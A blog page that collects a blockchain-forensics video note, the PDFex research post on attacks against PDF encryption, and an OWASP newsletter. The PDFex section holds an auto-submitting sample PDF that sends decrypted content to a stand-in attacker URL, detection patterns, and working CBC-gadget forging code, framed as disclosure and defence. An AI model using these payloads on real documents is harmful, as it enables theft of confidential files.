Wednesday, May 31, 2023

Blockchain Forensics R&D With Python - Tracking Attackers, Etherscan API Usage, Python Coding, Signature Lookups And Decompiling Bytecode

Added a new playlist over the last few weeks; it's up to about 8 videos now. It starts out writing code to monitor an attacker's address changes on the blockchain, followed by using the Etherscan APIs to track some movements and make sense of things, with a few other learning points along the way...

There is one pre-requisite video, however, which is where this series came from: another video I created where we took apart a smart contract from a YouTube scam to find the attacker's malicious code. Review that first, below:

Twitter: @ficti0n
Web: http://cclabs.io/


If you learn something from this blog/video consider sharing it on your social media or retweeting my posts.


Here is the pre-requisite video to this series, which does a smart contract audit of a malicious front-running bot:



Here is the new playlist series which digs into tracking this attacker: 


Link to the full playlist, since Blogger is not letting me embed the playlist:
https://www.youtube.com/playlist?list=PLCwnLq3tOElrUdIg4LgdhPhCKAiy7NZYA




Intro to the playlist: 


 

PDFex: Major Security Flaws In PDF Encryption

After investigating the security of PDF signatures, we had a deeper look at PDF encryption. In cooperation with our friends from Münster University of Applied Sciences, we discovered severe weaknesses in the PDF encryption standard which lead to full plaintext exfiltration in an active-attacker scenario.

To guarantee confidentiality, PDF files can be encrypted. This enables the secure transfer and storing of sensitive documents without any further protection mechanisms.
The key management between the sender and recipient may be password based (the recipient must know the password used by the sender, or it must be transferred to them through a secure channel) or public key based (i.e., the sender knows the X.509 certificate of the recipient).
In this research, we analyze the security of encrypted PDF files and show how an attacker can exfiltrate the content without having the corresponding keys.

So what is the problem?

The security problems known as PDFex discovered by our research can be summarized as follows:
  1. Even without knowing the corresponding password, the attacker possessing an encrypted PDF file can manipulate parts of it.
    More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file.
  2. PDF encryption uses the Cipher Block Chaining (CBC) encryption mode with no integrity checks, which implies ciphertext malleability.
    This allows us to create self-exfiltrating ciphertext parts using CBC malleability gadgets. We use this technique not only to modify existing plaintext but to construct entirely new encrypted objects.

Who uses PDF Encryption?

PDF encryption is widely used. Prominent companies like Canon and Samsung apply PDF encryption in document scanners to protect sensitive information.
Further providers like IBM offer PDF encryption services for PDF documents and other data (e.g., confidential images) by wrapping them into PDF. PDF encryption is also supported in different medical products to transfer health records, for example Innoport, Ricoh, and Rimage.
Due to the shortcomings regarding the deployment and usability of S/MIME and OpenPGP email encryption, some organizations use special gateways to automatically encrypt email messages as encrypted PDF attachments, for example CipherMail, Encryptomatic, and NoSpamProxy. The password to decrypt these PDFs can be transmitted over a second channel, such as a text message (i.e., SMS).


Technical details of the attacks

We developed two different attack classes on PDF Encryption: Direct Exfiltration and CBC Gadgets.

Attack 1: Direct Exfiltration (Attack A)


The idea of this attack is to abuse the partial encryption feature by modifying an encrypted PDF file. As soon as the file is opened and decrypted by the victim, sensitive content is sent to the attacker. Encrypted PDF files do not have integrity protection. Thus, an attacker can modify the structure of encrypted PDF documents, add unencrypted objects, or wrap encrypted parts into a context controlled by the attacker.
In the given example, the attacker abuses the flexibility of the PDF encryption standard to define certain objects as unencrypted. The attacker modifies the Encrypt dictionary (6 0 obj) in a way that the document is partially encrypted – all streams are left AES256 encrypted while strings are defined as unencrypted by setting the Identity filter. Thus, the attacker can freely modify strings in the document and add additional objects containing unencrypted strings.
The content to be exfiltrated is left encrypted, see Contents (4 0 obj) and EmbeddedFile (5 0 obj). The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript. The Action references the encrypted parts as content to be included in requests and can thereby be used to exfiltrate their plaintext to an arbitrary URL. The execution of the Action can be triggered automatically once the PDF file is opened (after the decryption) or via user interaction, for example, by clicking within the document.
This attack has three requirements to be successful. While all requirements are PDF standard compliant, they have not necessarily been implemented by every PDF application:
  • Partial encryption: Partially encrypted documents based on Crypt Filters like the Identity filter or based on other less supported methods like the None encryption algorithm.
  • Cross-object references: It must be possible to reference and access encrypted string or stream objects from unencrypted attacker-controlled parts of the PDF document.
  • Exfiltration channel: One of the interactive features allowing the PDF reader to communicate via the Internet must exist, with or without user interaction. Such features are PDF Forms, Hyperlinks, or JavaScript.
Please note that the attack does not abuse any cryptographic issues, so there are no requirements on the underlying encryption algorithm (e.g., AES) or the encryption mode (e.g., CBC).
In the following, we show three techniques by which an attacker can exfiltrate the content.

Exfiltration via PDF Forms (A1)


The PDF standard allows a document's encrypted streams or strings to be defined as values of a PDF form to be submitted to an external server. This can be done by referencing their object numbers as the values of the form fields within the Catalog object, as shown in the example on the left side. The value of the PDF form points to the encrypted data stored in 2 0 obj.
To make the form auto-submit itself once the document is opened and decrypted, an OpenAction can be applied. Note that the object which contains the URL (http://p.df) for form submission is not encrypted and completely controlled by the attacker. As a result, as soon as the victim opens the PDF file and decrypts it, the OpenAction will be executed by sending the decrypted content of 2 0 obj to (http://p.df).

Exfiltration via Hyperlinks (A2)

If forms are not supported by the PDF viewer, there is a second method to achieve direct exfiltration of a plaintext. The PDF standard allows setting a "base" URI in the Catalog object used to resolve all relative URIs in the document.
This enables an attacker to define the encrypted part as a relative URI to be leaked to the attacker's web server. Therefore the base URI will be prepended to each URI called within the PDF file. In the given example, we set the base URI to (http://p.df).
The plaintext can be leaked by clicking on a visible element such as a link, or without user interaction by defining a URI Action to be automatically performed once the document is opened.
In the given example, we define the base URI within an Object Stream, which allows objects of arbitrary type to be embedded within a stream. This construct is a standard compliant method to put unencrypted and encrypted strings within the same document. Note that for this attack variant, only strings can be exfiltrated due to the specification, but not streams; (relative) URIs must be of type string. However, fortunately (from an attacker's point of view), all encrypted streams in a PDF document can be re-written and defined as hex-encoded strings using the hexadecimal string notation.
Nevertheless, the attack has some notable drawbacks compared to Exfiltration via PDF Forms:
  • The attack is not silent. While forms are usually submitted in the background (by the PDF viewer itself), to open hyperlinks, most applications launch an external web browser.
  • Compared to HTTP POST, the length of HTTP GET requests, as invoked by hyperlinks, is limited to a certain size.
  • PDF viewers do not necessarily URL-encode binary strings, making it difficult to leak compressed data.

Exfiltration via JavaScript (A3)

The PDF JavaScript reference allows JavaScript code within a PDF document to directly access arbitrary string/stream objects within the document and leak them with functions such as *getDataObjectContents* or *getAnnots*.
In the given example, the stream object 7 is given a Name (x), which is used to reference and leak it with a JavaScript action that is automatically triggered once the document is opened. The attack has some advantages compared to Exfiltration via PDF Forms and Exfiltration via Hyperlinks, such as the flexibility of an actual programming language.
It must, however, be noted that – while JavaScript actions are part of the PDF specification – various PDF applications have limited JavaScript support or disable it by default (e.g., Perfect PDF Reader).
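The three requirements above translate directly into byte-level indicators that an incident responder can check before opening a received encrypted PDF. The triage script below is an added example, not the PDFex authors' tooling; the two sample documents it scans are constructed inline and are not real files.

```python
"""Triage check for the direct-exfiltration pattern (Attack A): an encrypted
PDF whose /Encrypt dictionary leaves strings or streams unencrypted and that
also carries an outbound action.  Added example, not the PDFex authors'
tooling; the sample documents below are constructed and not real files.
"""
import re

# Partial-encryption indicators in the /Encrypt dictionary (requirement 1).
PARTIAL_ENCRYPTION = [
    (rb"/StrF\s*/Identity", "strings left unencrypted (/StrF /Identity)"),
    (rb"/StmF\s*/Identity", "streams left unencrypted (/StmF /Identity)"),
    (rb"/CFM\s*/None", "crypt filter with /None"),
]
# Channels through which a reader may talk to the network (requirement 3).
CHANNELS = [
    (rb"/S\s*/SubmitForm", "form submission (A1)"),
    (rb"/S\s*/URI", "URI action (A2)"),
    (rb"/Base\s*\(", "base URI for relative links (A2)"),
    (rb"/S\s*/JavaScript|/JS\b", "JavaScript (A3)"),
]
AUTO_TRIGGER = rb"/OpenAction|/AA\b"


def triage(pdf: bytes) -> dict:
    """Scan raw PDF bytes and return the indicators found plus a verdict."""

    def found(pattern: bytes) -> bool:
        return re.search(pattern, pdf) is not None

    report = {
        "encrypted": found(rb"/Encrypt\b"),
        "partial": [label for pat, label in PARTIAL_ENCRYPTION if found(pat)],
        "channels": [label for pat, label in CHANNELS if found(pat)],
        "auto_trigger": found(AUTO_TRIGGER),
    }
    if not report["encrypted"]:
        report["verdict"] = "not encrypted"
    elif report["partial"] and report["channels"]:
        report["verdict"] = "suspicious: partially encrypted with exfiltration channel"
        if report["auto_trigger"]:
            report["verdict"] += ", auto-triggered on open"
    elif report["channels"]:
        # CBC gadget attacks (Attack B) need no partial encryption, so an
        # outbound action in a fully encrypted file still deserves a look.
        report["verdict"] = "review: encrypted document with outbound action"
    else:
        report["verdict"] = "no direct-exfiltration indicators"
    return report


# Constructed sample mirroring the A1 layout described in the post: strings
# are declared unencrypted via the Identity filter, and an OpenAction submits
# the still-encrypted object 4 0 to an attacker URL.
SAMPLE_ATTACK_A = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 3 0 R /AcroForm << /Fields [2 0 R] >>
  /OpenAction << /S /SubmitForm /F (http://p.df) /Fields [2 0 R] >> >> endobj
2 0 obj << /FT /Tx /T (x) /V 4 0 R >> endobj
6 0 obj << /Filter /Standard /V 5 /R 6 /Length 256
  /CF << /StdCF << /CFM /AESV3 /AuthEvent /DocOpen /Length 32 >> >>
  /StmF /StdCF /StrF /Identity >> endobj
trailer << /Root 1 0 R /Encrypt 6 0 R >>
%%EOF
"""

# Constructed benign sample: everything routed through the AESV3 filter.
SAMPLE_BENIGN = b"""%PDF-1.7
6 0 obj << /Filter /Standard /V 5 /R 6 /Length 256
  /CF << /StdCF << /CFM /AESV3 /AuthEvent /DocOpen /Length 32 >> >>
  /StmF /StdCF /StrF /StdCF >> endobj
trailer << /Root 1 0 R /Encrypt 6 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for name, doc in (("attack", SAMPLE_ATTACK_A), ("benign", SAMPLE_BENIGN)):
        print(name, triage(doc))
```

A plain byte scan cannot see keys hidden inside compressed or encrypted object streams (the A2 variant above puts the base URI in one), so a clean result is a triage pass, not a clearance; decompress object streams first for a thorough check.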

Attack 2: CBC Gadgets (Attack B)

Not all PDF viewers support partially encrypted documents, which makes them immune to direct exfiltration attacks. However, because PDF encryption generally defines no authenticated encryption, attackers may use CBC gadgets to exfiltrate plaintext. The basic idea is to modify the plaintext data directly within an encrypted object, for example, by prefixing it with a URL. The CBC gadget attack thus does not necessarily require cross-object references.
Note that all gadget-based attacks modify existing encrypted content or create new content from CBC gadgets. This is possible due to the malleability property of the CBC encryption mode.
This attack has two necessary preconditions:
  • Known plaintext: To manipulate an encrypted object using CBC gadgets, a known plaintext segment is necessary. For AESV3 – the most recent encryption algorithm – this plaintext is always given by the Perms entry. For older versions, known plaintext from the object to be exfiltrated is necessary.
  • Exfiltration channel: One of the interactive features: PDF Forms or Hyperlinks.
These requirements differ from those of the direct exfiltration attacks, because the attacks are applied "through" the encryption layer and not outside of it.
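The two preconditions above are all the arithmetic of a CBC gadget needs, and the same arithmetic shows why an integrity check stops it. The script below is an added illustration, not the PDFex authors' code: AES is replaced by a toy Feistel permutation built from SHA-256 so that only the standard library is needed (the gadget construction is cipher-agnostic), and the key, IV, and Perms tail are constructed values.

```python
"""CBC malleability behind the PDFex gadget attacks, and what an integrity
check changes.  Added illustration, not the PDFex authors' code: AES is
replaced by a toy Feistel permutation built from SHA-256 so that only the
standard library is needed; the gadget arithmetic is cipher-agnostic.
"""
import hashlib
import hmac

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    """4-round Feistel permutation on one 16-byte block (NOT secure)."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, right, rnd))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, left, rnd)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out.append(xor(toy_decrypt_block(key, block), prev))
        prev = block
    return b"".join(out)


# Constructed stand-in for the AESV3 /Perms entry: 12 bytes an attacker can
# predict (permission flags, 0xFF fill, 'T', "adb") plus a 4-byte random tail
# they do not know.  KEY and PERMS_IV are constructed; the attacker never
# learns KEY and only ever handles ciphertext.
KEY = hashlib.sha256(b"constructed file key").digest()[:16]
PERMS_IV = bytes(range(16))
PERMS_KNOWN = bytes([0xFC, 0xFF, 0xFF, 0xFF]) + b"\xff" * 4 + b"Tadb"
PERMS_UNKNOWN = b"\x13\x37\xbe\xef"
PERMS_CT = cbc_encrypt(KEY, PERMS_IV, PERMS_KNOWN + PERMS_UNKNOWN)


def gadget(chosen: bytes) -> tuple:
    """Return (X, C): two ciphertext blocks that decrypt, under the unknown
    key, to (16 unpredictable bytes, chosen + PERMS_UNKNOWN).  Only the 12
    known bytes can be chosen; the delta for the unknown tail is zero."""
    assert len(chosen) <= len(PERMS_KNOWN)
    delta = xor(PERMS_KNOWN[:len(chosen)], chosen).ljust(BLOCK, b"\x00")
    return xor(PERMS_IV, delta), PERMS_CT


def forge_object(*segments: bytes) -> tuple:
    """Assemble an encrypted object from gadgets without the key.  The first
    gadget's X serves as the object's IV and costs no garbage; every further
    gadget leaves 16 garbage bytes plus the 4 unknown bytes behind (the "20
    random bytes" per gadget the post describes)."""
    iv, body = None, b""
    for seg in segments:
        x, c = gadget(seg)
        if iv is None:
            iv, body = x, c
        else:
            body += x + c
    return iv, body


MAC_KEY = hashlib.sha256(b"constructed mac key").digest()


def seal(mac_key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """Encrypt-then-MAC tag over IV || ciphertext: the check PDF's CBC lacks."""
    return hmac.new(mac_key, iv + ciphertext, hashlib.sha256).digest()


def verify(mac_key: bytes, iv: bytes, ciphertext: bytes, tag: bytes) -> bool:
    """A reader that verified such a tag would refuse the forged object."""
    return hmac.compare_digest(seal(mac_key, iv, ciphertext), tag)


if __name__ == "__main__":
    iv, body = forge_object(b"http://p.df/", b"/exfil")
    print(cbc_decrypt(KEY, iv, body))
    print(verify(MAC_KEY, iv, body, seal(MAC_KEY, PERMS_IV, PERMS_CT)))
```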

Exfiltration via PDF Forms (B1)

As described above, PDF allows the submission of string and stream objects to a web server. This can be used in conjunction with CBC gadgets to leak the plaintext to an attacker-controlled server, even if partial encryption is not allowed.
A CBC gadget constructed from the known plaintext can be used as the submission URL, as shown in the example on the left side. The construction of this particular URL gadget is challenging. As PDF encryption uses PKCS#5 padding, constructing the URL using a single gadget from the known Perms plaintext is difficult, as the last 4 bytes that would need to contain the padding are unknown.
However, we identified two techniques to solve this. On the one hand, we can take the last block of an unknown ciphertext and append it to our constructed URL, essentially reusing the correct PKCS#5 padding of the unknown plaintext. Unfortunately, this would introduce 20 bytes of random data from the gadgeting process and up to 15 bytes of the unknown plaintext to the end of our URL.
On the other hand, the PDF standard allows the execution of multiple OpenActions in a document, allowing us to essentially guess the last padding byte of the Perms value. This is possible by iterating over all 256 possible values of the last plaintext byte to get 0x01, resulting in a URL with as few random bytes as possible (3 bytes). As a limitation, if one of the 3 random bytes contains special characters, the form submission URL might break.

Exfiltration via Hyperlinks (B2)

Using CBC gadgets, encrypted plaintext can be prefixed with one or more chosen plaintext blocks. An attacker can construct URLs in the encrypted PDF document that contain the plaintext to exfiltrate. This attack is similar to the exfiltration hyperlink attack (A2). However, it does not require the setting of a "base" URI in plaintext to achieve exfiltration.
The same limitations described for direct exfiltration based on links (A2) apply. Additionally, the constructed URL contains random bytes from the gadgeting process, which may prevent the exfiltration in some cases.

Exfiltration via Half-Open Object Streams (B3)

While CBC gadgets are generally restricted to the block size of the underlying block cipher – and more specifically the length of the known plaintext, in this case, 12 bytes – longer chosen plaintexts can be constructed using compression. Deflate compression, which is available as a filter for PDF streams, allows writing both uncompressed and compressed segments into the same stream. The compressed segments can reference back to the uncompressed segments and achieve the repetition of byte strings from these segments. These backreferences allow us to construct longer continuous plaintext blocks than CBC gadgets would typically allow for. Naturally, the first uncompressed occurrence of a byte string still appears in the decompressed result. Additionally, if the compressed stream is constructed using gadgets, each gadget generates 20 random bytes that appear in the decompressed stream. A non-trivial obstacle is to keep the PDF viewer from interpreting these fragments in the decompressed stream. While hiding the fragments in comments is possible, PDF comments are single-line and are thus susceptible to newline characters in the random bytes. Therefore, in reality, the length of constructed compressed plaintexts is limited.
To deal with this caveat, an attacker can use Object Streams, which allow the storage of arbitrary objects inside a stream. The attacker uses an object stream to define new objects using CBC gadgets. An object stream always starts with a header of space-separated integers which define the object number and the byte offset of each object inside the stream. The dictionary of an object stream contains the key First, which defines the byte offset of the first object inside the stream. An attacker can use this value to create a comment of arbitrary size by setting it to the first byte after their comment.
Using compression has the additional advantage that compressed, encrypted plaintexts from the original document can be embedded into the modified object. As PDF applications often create compressed streams, these can be incorporated into the attacker-created compressed object and will therefore be decompressed by the PDF applications. This is a significant advantage over leaking the compressed plaintexts without decompression as the compressed bytes are often not URL-encoded correctly (or at all) by the PDF applications, leading to incomplete or incomprehensible plaintexts. However, due to the inner workings of the deflate algorithms, a complete compressed plaintext can only be prefixed with new segments, but not postfixed. Therefore, a string created using this technique cannot be terminated using a closing bracket, leading to a half-open string. This is not a standard compliant construction, and PDF viewers should not accept it. However, a majority of PDF viewers accept it anyway.

Evaluation

During our security analysis, we identified two standard compliant attack classes which break the confidentiality of encrypted PDF files. Our evaluation shows that among 27 widely-used PDF viewers, all of them are vulnerable to at least one of those attacks, including popular software such as Adobe Acrobat, Foxit Reader, Evince, Okular, Chrome, and Firefox.
You can find the detailed results of our evaluation here.

What is the root cause of the problem?

First, many data formats allow encrypting only parts of the content (e.g., XML, S/MIME, PDF). This encryption flexibility is difficult to handle and allows an attacker to include their own content, which can lead to exfiltration channels.
Second, when it comes to encryption, AES-CBC – or encryption without integrity protection in general – is still widely supported. Even the latest PDF 2.0 specification, released in 2017, still relies on it. This must be fixed in future PDF specifications and any other format encryption standard, without enabling backward compatibility that would re-enable CBC gadgets.
A positive example is the JSON Web Encryption standard, which learned from the CBC attacks on XML and does not support any encryption algorithm without integrity protection.

Authors of this Post

Jens Müller
Fabian Ising
Vladislav Mladenov
Christian Mainka
Sebastian Schinzel
Jörg Schwenk

Acknowledgements

Many thanks to the CERT-Bund team for the great support during the responsible disclosure process.

November 2019 Connector

OWASP
Connector
November 2019

COMMUNICATIONS


Letter from the Vice-Chairman

Dear OWASP Community, 

Preparation for next year's conferences is underway. I had the pleasure of meeting people from our community at a recent ISACA Ireland event where I had an OWASP stand. I also had lots of swag to give away, loads left which I plan to share out amongst the community. 

I was on a call recently with both WIA leadership and a number of individuals looking to broaden our diversity reach, forming DIA (diversity in AppSec). This was a positive call and I look forward to reviewing their proposal under the committee 2.0 operating model.

I'd like to thank our volunteers, chapter and project leaders for making OWASP what it is today. We wouldn't have a foundation without you. We always want to make things better, to this end, it would be great if you could fill out the following feedback form.

Thank you, 
Owen Pendlebury, Vice-Chairman

FROM THE EXECUTIVE DIRECTOR


As we wind down 2019, we are planning lots of new opportunities to get involved with OWASP next year. The current working draft of the 2020 Operating Plan can be found on our staging site for our new website which is planned to launch next month.
 
Some of the highlights for 2020:
  • Quarterly Town Hall meetings.
  • Two Project Summits - the first in February 2020
  • Pilot single-day AppSec Days worldwide to offer local training and community.
We are also set to further increase the transparency of the daily workings of OWASP through our Staff Projects page. The pages linked there will always be a work in progress; some of them today are still only templates, but they are still a great resource for knowing what's going on at OWASP.

All of this adds to our Global and Regional Events, ongoing local chapter support, and other member activities. Our plans are ambitious, and we look forward to your continued support this and every month as we look to better secure the web.



OWASP Foundation Global AppSec Event Dates for 2020

Global AppSec Dublin, June 15 - 19, 2020
(Formerly known as AppSec EU)
Sponsorship is now available
Call for Papers & Call for Training December 2019
 
Global AppSec San Francisco, October 19 - 23, 2020
(Formerly known as AppSec US)
CFP &  CFT February 2020

** Visit our website for future announcements.**
NEW OWASP Project Summit - Winter 2020
February 2020 in Cancun, Mexico

 
The OWASP Foundation will host a three-day working session for FIVE selected projects in Cancun, Mexico, February 2020. Arrival day will be Wednesday the 19th and departures will be the 23rd. Projects must apply and then get selected to participate. The application process will require project meeting goals, work plans, key contributors, and expected attendance. The OWASP Foundation Officers Group will make the final selection. For more information click here

You can also email Emily Berman Global Events Director or Harold Blankenship Director of Technology and Projects.
Announcing a New Opportunity to become part of a Global AppSec Program Team
 
Conference Program Teams are constituted for each Global AppSec event and consist of OWASP members and staff. The selection of team members is based on subject-matter expertise and a balanced representation of the OWASP community. For planning purposes, team members shall reside on the continent of the Global AppSec for which they serve. Teams are constituted no later than six months prior to the Global AppSec event.

To apply to become a member of the Conference Program Team click here.


 
We are so excited to announce that both the London OWASP and WIA communities have been asked to speak at BlackHat Europe 2019 on Wednesday 4 December at the EXCEL London. Andra Lezza is leading the panel of women to "Share insights gained at different stages of their careers to help other women in the field." Thank you, Andra, for leading the initiative, and also to Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel. Also speaking from the OWASP community are London Chapter Leader Sam Stepanyan and Paul Harragan; Sam and Paul will be presenting a more in-depth demo of OWASP Nettacker. Good luck to all the speakers; have a great conference.

I would like to encourage all of the OWASP community that will be attending BlackHat Europe to please make every effort to attend and support our fellow OWASP members Wednesday, 4 December 2019. (Click to view the schedule details.)

OWASP Members don't forget you are eligible for € 200.00 discount, email marketing@owasp.org for code to use when registering.


BlackHat Europe has extended an invitation to our London WIA community  to  lead a panel to "Share insights gained at different stages of their careers that could help other women in the field."  Thank you to Andra Lezza for leading this initiative and Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel and to contribute.  Good luck I am sure your session will be a huge success.

BlackHat Europe 2019 London at EXCEL London
2019 December 2-5 
The OWASP Booth 1015
Business Hall December 4 & 5 
December 4, 10:30 AM - 7:00 PM
December 5: 10:00 AM - 4:00 PM

EVENTS 

You may also be interested in one of our other affiliated events:


REGIONAL EVENTS
Event | Date | Location
German OWASP Day 2019 | December 10, 2019 | Karlsruhe, Germany
AppSec California 2020 | January 21 - 24, 2020 | Santa Monica, CA
OWASP New Zealand Day 2020 | February 20 - 21, 2020 | Auckland, New Zealand
OWASP Seasides | March 3 - 5, 2020 | Panjim Goa, India
SnowFROC 2020 | March 5, 2020 | Denver, CO
AppSec Morocco & Africa 2020 | June 4 - 5, 2020 | Rabat, Morocco

GLOBAL PARTNERSHIP EVENTS
Event | Date | Location
BlackHat Europe 2019 | December 2 - 5, 2019 | London

PROJECTS


As the foundation moves toward the migration of the OWASP web presence from the old wiki site to our new Github-hosted home, some of you may still have questions regarding what to move and how to move it. Essentially, if you have a chapter page or project page and you have not migrated it to the new website, that would be first. Steps on what to do and what is needed can be found at https://www2.owasp.org/migration There are also some minor instructions on the default project or chapter page itself. And if you are wondering where that page is located, you can go to https://github.com/OWASP and type your chapter name in the repository search bar. If your project or chapter is not there, contact me. Lastly, there are a number of excellent examples already done by other leaders (also linked on the migration page).

And, as a precaution, you should click over into the 'Settings' of your repository and then click the 'Collaborators & teams' link on the left menu and check to make sure that the usernames added to Collaborators match what you expect.  Having someone you do not know edit your web page without your knowledge is no longer the expected behavior.

Some resources, mostly for projects, have been uploaded to the OWASP Site Theme Repository and can be linked to via the /assets/image/common/<file> URL.

After your chapter or project page is done, there is a www-community repository which would include any files from the wiki that are not currently in a project or chapter or board/staff policy area.  For instance, there are pages there for GSoC and XSS and CSRF.  A list of the top pages that need to be migrated can be found attached to one of the TODO cards on our website migration Trello board which you are invited to join if you want to help migrate loose pages and/or perform some automation work.

Our current plan can be found on the Website Relaunch project page.

PROJECT ANNOUNCEMENT

As part of OWASP's participation in Google's Season of Docs, the ZAP project has had Nirojan Selvanathan (@sshniro)  working on API documentation.  The first iteration of the documentation is now live.  It includes Java, Python, and shell
example snippets all presented in a responsive and accessible design which we will continue to build on in the future.

Big thanks to Nirojan for his efforts on this wonderful initiative!
Congratulations and thanks to Google Open Source for helping to bring the open-source and technical writer communities together!

COMMUNITY

 
Welcome to our New OWASP Chapters

Colombo, Sri Lanka
Des Moines, IA
Harrisburg, PA
Louisville, KY
Monterrey, Brazil
Moscow, Russia


 
Contributor Corporate Members
 

 
Ads and logos are not endorsements and reflect the messages of the advertiser only.
Our mailing address is:
OWASP Foundation 
1200-C Agora Drive, #232
Bel Air, MD 21014  